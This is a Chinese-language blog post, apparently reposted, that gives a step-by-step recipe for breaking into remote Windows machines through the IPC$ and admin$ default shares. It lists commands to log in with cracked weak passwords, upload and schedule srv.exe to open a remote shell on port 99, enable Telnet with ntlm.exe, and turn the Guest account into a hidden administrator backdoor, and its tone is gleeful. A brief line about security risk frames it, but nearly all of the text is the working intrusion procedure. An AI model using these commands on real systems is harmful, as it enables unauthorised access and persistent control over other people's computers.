記憶盒子

電腦如果沒有關(guān)閉默認(rèn)共享，或者啟用了遠(yuǎn)程協(xié)助共享，那么就有可能被不法分子入侵，給網(wǎng)絡(luò)安全帶來隱患。

這里介紹利用ipc$和默認(rèn)共享入侵遠(yuǎn)程電腦的過程。

1. C:\>net use \\127.0.0.1\IPC$ "密碼" /user:"用戶名"
一般用流光，通過掃描弱口令來得到，管理員帳號(hào)和密碼.

2. C:\>copy srv.exe \\127.0.0.1\admin$
先復(fù)制srv.exe上去，在流光的Tools目錄下就有（這里的$是指admin用戶的c:\winnt\system32\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要復(fù)制到什么地方去了）。

3. C:\>net time \\127.0.0.1
查查時(shí)間，發(fā)現(xiàn)127.0.0.1 的當(dāng)前時(shí)間是 2004/6/15 上午 11:00，命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動(dòng)srv.exe吧

5. C:\>net time \\127.0.0.1
再查查到時(shí)間沒有？如果127.0.0.1 的當(dāng)前時(shí)間是 2004/6/15 上午 11:05，那就準(zhǔn)備開始下面的命令。

6. C:\>telnet 127.0.0.1 99
這里會(huì)用到Telnet命令吧，注意端口是99。Telnet默認(rèn)的是23端口，但是我們使用的是SRV在對(duì)方計(jì)算機(jī)中為我們建立一個(gè)99端口的Shell。
雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個(gè)Telnet服務(wù)！這就要用到ntlm了

7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機(jī)上（ntlm.exe也是在《流光》的Tools目錄中）。

8. C:\WINNT\system32>ntlm
輸入ntlm啟動(dòng)（這里的C:\WINNT\system32>指的是對(duì)方計(jì)算機(jī)，運(yùn)行ntlm其實(shí)是讓這個(gè)程序在對(duì)方計(jì)算機(jī)上運(yùn)行）。當(dāng)出現(xiàn)"DONE"的時(shí)候，就說明已經(jīng)啟動(dòng)正常。然后使用"net start telnet"來開啟Telnet服務(wù)！

9. Telnet 127.0.0.1，接著輸入用戶名與密碼就進(jìn)入對(duì)方了，****作就像在DOS上****作一樣簡(jiǎn)單！(然后你想做什么?想做什么就做什么吧,哈哈)

為了以防萬(wàn)一,我們?cè)侔裧uest激活加到管理組
10. C:\>net user guest /active:yes
將對(duì)方的Guest用戶激活

11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設(shè)定的密碼

12. C:\>net localgroup administrators guest /add
將Guest變?yōu)锳dministrator(如果管理員密碼更改，guest帳號(hào)沒改變的話，下次我們可以用guest再次訪問這臺(tái)計(jì)算機(jī))

文章來源：網(wǎng)絡(luò)

廣告

海外云主機(jī)

低至54元 - 可退款

立即選購(gòu) >

rxinyun

立即選購(gòu) >

標(biāo)簽: Windows  

※ 網(wǎng)站速度慢？試試網(wǎng)站自動(dòng)優(yōu)化工具 ※